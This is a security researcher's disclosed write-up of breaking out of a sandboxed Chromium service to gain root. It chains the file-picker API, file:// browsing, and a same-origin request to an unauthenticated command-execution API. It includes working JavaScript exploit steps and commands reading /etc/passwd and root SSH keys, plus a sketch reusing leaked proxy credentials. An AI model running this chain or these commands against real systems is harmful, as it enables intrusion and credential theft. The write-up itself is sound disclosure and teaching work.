I Was Supposed to Only Have a Browser
How I escaped a sandboxed Chromium environment and got root-level command execution through a chain of overlooked security gaps

I was testing a cloud-based browser environment. You SSH in and all you get is a Chromium window -- that's the entire interface; there's nothing else.
Spent about an hour trying things that didn't work before I found something that did. After that it went fast. Five separate issues, none of them critical on their own, but one led to the next and I ended up breaking out of the browser with root access on the host.
What I Was Looking At
A Chromium browser running inside a container. The only thing you're supposed to have is the browser window -- you shouldn't be able to touch the host at all.
If you're not familiar with this kind of setup -- the idea is that you take a browser, run it inside a container (like Docker), and restrict what it can do. Users can browse the web but can't read the server's files, run commands, or mess with other services on the same machine. Like a hotel room -- you can use everything in the room but you can't walk into the kitchen or the manager's office.
None of it held up.
Dead Ends First
I spent a while on stuff that didn't work before finding what did. I'm including the failures because this is how it actually goes -- you try the obvious stuff, it all fails, and then something unexpected works.
Direct fetch() to local files:
fetch('file:///home/kernel/Downloads/start_all.sh')
  .then(r => r.text())
  .catch(e => console.log(e));
// CORS policy blocks file:// requests
Blocked. CORS on file:// URLs. Fair enough.
If you haven't dealt with CORS before: CORS (Cross-Origin Resource Sharing) is a browser security feature that stops a web page from making requests to a different domain. If you're on https://google.com, your JavaScript can't reach out to https://mybank.com and pull data -- the browser blocks it unless mybank.com explicitly allows it through HTTP headers. The file:// protocol (opening local files in a browser) gets an opaque origin of its own, so CORS blocks requests between file:// and http://.
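Here's the shape of it, using the same illustrative domains:

// Run from a page on https://google.com -- cross-origin, so the browser
// blocks it unless mybank.com opts in via Access-Control-Allow-Origin
fetch('https://mybank.com/account')
  .then(r => r.text())
  .catch(e => console.log(e)); // TypeError: Failed to fetch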
XMLHttpRequest:
var xhr = new XMLHttpRequest();
xhr.open('GET', 'file:///home/kernel/Downloads/start_all.sh', false);
xhr.send();
// CORS error
Same wall. Different API, same restriction.
HTML element tricks:
Tried <iframe>, <object>, <embed> pointing at file:// URLs. All blocked by CORS. Tried Service Worker Cache API -- "Request scheme 'file' is unsupported."
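Roughly what the element version looked like (reconstructed; the <object> and <embed> variants fail the same way):

// Point an <iframe> at a local file -- Chromium refuses the load,
// same wall as the fetch attempts
const frame = document.createElement('iframe');
frame.src = 'file:///home/kernel/Downloads/start_all.sh';
document.body.appendChild(frame);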
Standard approaches were all blocked. So I started looking sideways.
Finding the Crack: What's Available in window?
When the obvious stuff doesn't work, I like to check what I actually have access to. Dumped every function on the window object:
Object.keys(window).filter(k => typeof window[k] === 'function')
Most of it was standard -- alert, atob, blur, fetch, the usual. But a few stood out:
"showOpenFilePicker"
"showSaveFilePicker"
"webkitRequestFileSystem"
"webkitResolveLocalFileSystemURL"
showOpenFilePicker() -- the File System Access API. It's meant for web apps that let users pick files for upload (Google Docs uses it). Opens the native OS file picker dialog, gives you file handles you can read with JavaScript.
Why did this work when fetch() didn't? fetch() is code-initiated, so the browser runs it through CORS. showOpenFilePicker() pops up a dialog and the user physically clicks on a file -- the browser treats that as the user granting permission, so CORS never gets involved. Makes sense for document editors. In a locked-down browser environment, it means you can read anything the file picker can navigate to.
showOpenFilePicker().then(handles => {
  handles[0].getFile().then(file => {
    const reader = new FileReader();
    reader.onload = (e) => {
      console.log(e.target.result);
    };
    reader.readAsText(file);
  });
});
A file picker opened. I navigated to /home/kernel/Downloads/. Selected wrapper.sh. And the contents appeared in my console.
I could read files.
Reading the System's Blueprints
From here, the rest came quick.
wrapper.sh had the startup sequence:
#!/bin/bash
# starts various services
supervisorctl -c /etc/supervisor/supervisord.conf start kernel-images-api
# handle Chromium launch
# ... xdotool automation to dismiss sandbox warnings ...
while ! nc -z 127.0.0.1 "${API_PORT}"; do
  sleep 0.5
done
If you haven't seen supervisord before -- it's a process manager for Linux. Starts, stops, and watches programs. The supervisorctl start kernel-images-api line launches a service called kernel-images-api. The nc -z loop at the bottom keeps checking if something is listening on the API port and waits until it responds. So there's definitely an API running, and the system won't start without it.
start_all.sh had the port:
export API_PORT=10001
export KERNEL_IMAGES_API_PORT=10001
Port 10001. Now I knew where to look.
Quick note on file:// if you're not familiar: when you type file:///some/path in a browser, you're reading directly from the local filesystem instead of fetching from a web server. On your laptop, that's fine -- those are your files. In a containerized environment, "local filesystem" means the container's filesystem, which has system files, configs, and logs the user was never supposed to see.
The file:// protocol gave me more than just the Downloads folder. I could browse everything:
file:///var/log/supervisord/ --> all supervisor logs
file:///etc/passwd --> full user list
file:///home/kernel/extensions/ --> browser extensions
The supervisor logs were the real find. They showed API requests:
POST http://localhost:10001/process/exec
POST http://localhost:10001/computer/execute
/process/exec. That's a pretty suggestive endpoint name.
But knowing an endpoint exists and knowing how to call it are different things. I still needed to figure out the request format -- what method, what headers, what the payload looks like.
I started by navigating to http://localhost:10001 and poking around in DevTools. Tried a few GET requests to see what the API would tell me about itself. The root path returned a 404 but some endpoints returned JSON responses that gave away the structure. I could see from the network tab that previous requests used POST with Content-Type: application/json.
Then I tried sending a basic POST to /process/exec with a JSON body. First attempt got a 500 error back -- but the error response itself was useful because it showed what the API expected. The response format had fields like stdout_b64, stderr_b64, exit_code, and duration_ms. So the API takes a command, runs it, and returns the output base64-encoded.
I also checked /usr/local/sbin/ through the file picker to see if the actual binary or any docs were lying around that would confirm the payload format. Between the log entries, the error responses, and the files on disk, I had enough to piece together the full request:
POST /process/exec
Content-Type: application/json
{"command": "some shell command"}
Response comes back as:
{
  "duration_ms": 1,
  "exit_code": 0,
  "stdout_b64": "<base64 encoded output>",
  "stderr_b64": ""
}
Now I just needed to get past CORS to actually make the call from the browser.
The Chrome Extension with Hardcoded Credentials
I also noticed a custom Chrome extension -- a proxy extension called chromeproxy.
file:///home/kernel/extensions/chromeproxy/
Three files: background.js, background.js.template, manifest.json.

The background.js had the proxy configuration in plain text:
var config = {
  mode: "fixed_servers",
  rules: {
    singleProxy: {
      scheme: "http",
      host: "XX.XX.XX.XX",
      port: 61234,
    },
    bypassList: [
      "localhost",
      "*.onkernel.com",
      "*.ts.net",
    ],
  },
};

chrome.proxy.settings.set({ value: config, scope: "regular" }, function () {});

function callbackFn(details) {
  return {
    authCredentials: {
      username: "XXXXXXXXXX",
      password: "XXXXXXXXXX",
    },
  };
}

chrome.webRequest.onAuthRequired.addListener(
  callbackFn,
  { urls: ["<all_urls>"] },
  ["blocking"]
);
Proxy username and password, hardcoded in JavaScript, readable by anyone in the browser environment. The extension also had "Allow access to file URLs" toggled on and permissions to read all your data on all websites. Not part of the RCE chain directly, but not great either.
For context: a proxy server sits between your browser and the internet. All your web traffic goes through it. Having the proxy creds means you could set up your own browser to use the same proxy, or potentially see what traffic flows through it. The bypassList is also useful -- it tells you which domains are internal (*.onkernel.com, *.ts.net) and don't go through the proxy, which is basically free reconnaissance about the company's infrastructure.
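To make that concrete: anyone who can read background.js can route their own traffic through the same proxy. A hypothetical sketch with Node's undici library -- the host, port, and credentials are the redacted values from the extension:

// Hypothetical: reuse the extension's proxy settings from a Node script
import { fetch, ProxyAgent } from 'undici';

const agent = new ProxyAgent({
  uri: 'http://XX.XX.XX.XX:61234',
  token: 'Basic ' + Buffer.from('USERNAME:PASSWORD').toString('base64'),
});

const res = await fetch('https://example.com', { dispatcher: agent });
console.log(res.status); // this traffic now exits through their proxy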
CORS Gets in the Way (Briefly)
So I had an API on localhost:10001 with an endpoint called /process/exec. Tried calling it.
fetch('http://localhost:10001/process/exec', {
  method: 'POST',
  headers: {'Content-Type': 'application/json'},
  body: JSON.stringify({command: 'id'})
})
// Error: CORS policy blocks this request
CORS again. Browser origin is file://, API is http://localhost:10001. Different origins, blocked.
One thing about CORS that matters here: it's enforced by the browser, not the server. The API doesn't care where the request came from -- it'll respond to anything. The browser checks the response headers and decides whether to let your JavaScript see the result. So CORS only matters if the attacker is using a browser. Someone with curl wouldn't even know CORS was a thing.
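To see what that means in practice, here's the same request from outside a browser -- a Node 18+ sketch using its built-in fetch (curl would make the identical point), run from anywhere that can reach the port:

// No browser, no CORS -- the server answers the exact request the browser refused
fetch('http://localhost:10001/process/exec', {
  method: 'POST',
  headers: { 'Content-Type': 'application/json' },
  body: JSON.stringify({ command: 'id' }),
})
  .then(r => r.json())
  .then(d => console.log(Buffer.from(d.stdout_b64, 'base64').toString()));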
And even in the browser, there's a workaround. Same-origin requests skip CORS entirely. Your origin is whatever URL is in the address bar. At file://? That's your origin. Navigate to http://localhost:10001? Now that's your origin. And requests from http://localhost:10001 to http://localhost:10001/process/exec are same-origin. No CORS check happens at all.
Typed http://localhost:10001 in the address bar. 404 page. Didn't care. Right origin.
Root
F12. Console. Typed:
fetch('/process/exec', {
  method: 'POST',
  headers: {'Content-Type': 'application/json'},
  body: JSON.stringify({command: 'id'})
}).then(r => r.json()).then(d => console.log(atob(d.stdout_b64)));
uid=0(root) gid=0(root) groups=0(root)
Root.
Zero auth on the endpoint. Send a command, get the output back in base64, and it runs everything as root.
If atob(d.stdout_b64) looks weird -- base64 is just an encoding that turns data into ASCII text. Not encryption; anyone can decode it. The API sends output in base64, and atob() decodes it back. So cm9vdA== becomes root.
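You can check it right in the console:

btoa('root')     // "cm9vdA=="
atob('cm9vdA==') // "root"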
At this point I could run whatever I wanted:
// read /etc/passwd
{command: 'cat /etc/passwd'}
// list all processes (all running as root)
{command: 'ps aux'}
// read SSH keys
{command: 'cat /root/.ssh/id_rsa'}
// check the network
{command: 'netstat -tlnp'}
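Once you're running a lot of commands, a tiny wrapper helps. A minimal sketch -- the run() name is mine; the request and response shapes are exactly what the API returns:

// Wrapper around /process/exec; call it from the http://localhost:10001
// origin so the request stays same-origin
async function run(command) {
  const res = await fetch('/process/exec', {
    method: 'POST',
    headers: { 'Content-Type': 'application/json' },
    body: JSON.stringify({ command }),
  });
  const d = await res.json();
  return {
    exitCode: d.exit_code,
    stdout: atob(d.stdout_b64),
    stderr: atob(d.stderr_b64),
  };
}

run('ps aux').then(r => console.log(r.stdout));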
Everything running as root. Every file readable. I was well outside the browser at this point.
The Full Chain
The full attack path:
Step 1: Enumerate window APIs
        Found showOpenFilePicker() available
  |
  v
Step 2: Read local files via File Picker
        Read wrapper.sh, start_all.sh
        Discovered API on port 10001
  |
  v
Step 3: Browse filesystem via file:// protocol
        Read supervisor logs
        Found /process/exec endpoint
        Found hardcoded proxy credentials
  |
  v
Step 4: Navigate to http://localhost:10001
        Bypassed CORS by matching origin
  |
  v
Step 5: POST to /process/exec
        No authentication required
        Commands execute as root
  |
  v
Full system compromise
If you look at each piece on its own, none of it is that bad. The file picker is doing what file pickers do. Browsing local files is a browser feature. Logs being readable is common. Navigating to localhost is how browsers work. An internal API without auth isn't unusual for services that aren't supposed to be reachable.
But when one leads to the next, you end up with root on the host from a browser that was supposed to be your only access.
What Should Have Stopped This
Five layers could have stopped this. All five missed:
Layer 1: File System Access
  Expected: Browser can't read system files
  Actual:   file:// protocol enabled, showOpenFilePicker() available
  Fix:      Disable file:// protocol (--disable-file-url-access)
            or restrict to user home only

Layer 2: Information Isolation
  Expected: User can't see system architecture
  Actual:   Shell scripts and logs reveal services, ports, endpoints
  Fix:      Don't put startup scripts in accessible directories
            Restrict log file permissions (chmod 750)

Layer 3: Network Isolation
  Expected: Browser can't reach host services
  Actual:   localhost:10001 fully accessible
  Fix:      Network namespace isolation
            Block localhost access from browser process

Layer 4: API Authentication
  Expected: Even if reached, API requires auth
  Actual:   Zero authentication on /process/exec
  Fix:      API key, JWT, mutual TLS -- anything

Layer 5: Privilege Separation
  Expected: Even if API is exploited, damage is limited
  Actual:   Everything runs as root
  Fix:      Run API as unprivileged user with minimal permissions
Any one of these, done right, would have killed the chain or at least limited what I could do with it.
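To be concrete about Layer 4: even a ten-line key check would have cut the chain at the last step. A hypothetical sketch in Express -- I don't know what the real API is built with, so read this as the shape of the fix, not the fix itself:

// Hypothetical API-key middleware. The key lives in a server-side env var,
// never in anything the browser can read.
const express = require('express');
const crypto = require('crypto');

const app = express();
app.use(express.json());

app.use((req, res, next) => {
  const key = Buffer.from(req.get('X-Api-Key') || '');
  const expected = Buffer.from(process.env.KERNEL_API_KEY || '');
  // constant-time compare; lengths must match or timingSafeEqual throws
  const ok = key.length === expected.length && crypto.timingSafeEqual(key, expected);
  if (!ok) return res.status(401).json({ error: 'unauthorized' });
  next();
});
// ...the /process/exec handler would register behind this middleware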
The Hardcoded Credentials Problem
Separate issue from the RCE, but the background.js file also contained:
authCredentials: {
  username: "XXXXXXXXX",
  password: "XXXXXXXXX",
}
HTTP proxy credentials for routing all browser traffic. Plaintext JavaScript, readable from file:// or the Extensions page, same creds showing up in the proxy auth dialog. If this proxy is shared across instances, those credentials work for all of them.
Don't put credentials in client-side code. Per-session tokens, env vars that aren't browser-readable, or server-side proxy auth -- any of those would have been fine.
What Defense in Depth Actually Means
Defense in depth is a security concept where you never rely on a single protection. Multiple layers, each one assuming the one before it already failed. Like a building -- you don't just lock the front door. You have a deadbolt, a camera, an alarm, and a safe inside. Someone picks the lock? Alarm gets them. Alarm fails? Safe protects the valuables.
Here, the whole security model was one layer: the browser itself. Once I got past what the browser was supposed to restrict, there was nothing behind it.
What it should have looked like:
Even if the browser restrictions fail:
  -> File permissions prevent reading system configs
Even if configs are read:
  -> Network isolation prevents reaching host APIs
Even if APIs are reached:
  -> Authentication prevents unauthorized calls
Even if auth is bypassed:
  -> The API runs as an unprivileged user
Even if the user has some access:
  -> Command whitelisting prevents arbitrary execution
Every layer assumes the one above it already failed. That's the whole idea.
Timeline
| Date | Event |
|---|---|
| January 17, 2026 | Started exploring the browser environment |
| January 17, 2026 | Discovered file reading via showOpenFilePicker() |
| January 17, 2026 | Found unauthenticated API, achieved RCE as root |
| January 28, 2026 | Full disclosure report submitted |
Few hours total. Most of that was dead ends. Once showOpenFilePicker() worked, the rest took maybe 15 minutes.
SWAG
The Kernel team sent me some nice swag.
Some might say "oh, that's it?" -- honestly, I don't really care. I had fun poking around and discovering new things, and that's what matters most to me.
Quick Reference: Concepts Used in This Post
If any of the terms here were new to you:
| Term | What It Is |
|---|---|
| Browser isolation | Restricting a browser so users can only browse the web -- no file access, no host services, no command execution |
| CORS | Browser feature that blocks web pages from making requests to a different domain than the one they came from |
| Same-origin policy | Two URLs are "same origin" if they share the same protocol, host, and port. file:// and http://localhost are different origins |
| file:// protocol | Tells the browser to read directly from the local filesystem instead of fetching from a web server |
| showOpenFilePicker() | Browser API that opens the OS file picker dialog; bypasses CORS because it's treated as user-initiated |
| Base64 | An encoding (not encryption) that turns data into ASCII text. atob() decodes it, btoa() encodes it |
| Supervisord | A process manager that starts, stops, and monitors programs on Linux systems |
| RCE | Remote Code Execution -- the ability to run arbitrary commands on a system you shouldn't have access to |
| Defense in depth | Security principle: multiple independent layers of protection, each assuming the previous one failed |
| Privilege separation | Running services with the minimum permissions they need, so a compromise doesn't give full system access |
Key Takeaways
If you're building browser-only environments:
- --disable-file-url-access on Chromium. There's no reason a restricted browser needs to read local files.
- Network namespaces. The browser shouldn't be able to hit localhost on the host. If it needs internet, proxy it -- but don't hardcode the proxy creds in a readable extension.
- Auth on internal APIs. "Only trusted processes can reach this port" is the assumption that gets you owned when someone breaks out of the browser.
- Drop privileges. If the API ran as a locked-down user instead of root, this whole thing would have ended at a useless shell.
- Don't leave shell scripts and log files in directories the browser can read. That's how I found the API in the first place.

If you're doing security research:
- When the standard stuff is blocked, enumerate what you have. Object.keys(window) showed me showOpenFilePicker(). A legit browser API used in a way nobody planned for.
- CORS is not a security boundary. Change your origin and it goes away.
- Look for chains. showOpenFilePicker() alone isn't a vuln. Neither is a localhost API. But stacked together they're a full compromise.
- Read everything. Log files, startup scripts, extension source code. The thing that breaks the whole system is usually sitting in a file nobody thought to protect.
Everything in this write-up was a normal feature doing exactly what it was built to do. The file picker works as designed. The file protocol works as designed. CORS works as designed. The problem was that the browser was the only thing between the user and the system, and once I got past it, everything behind it was wide open. If you're giving untrusted users browser-only access, plan for someone to get past the browser.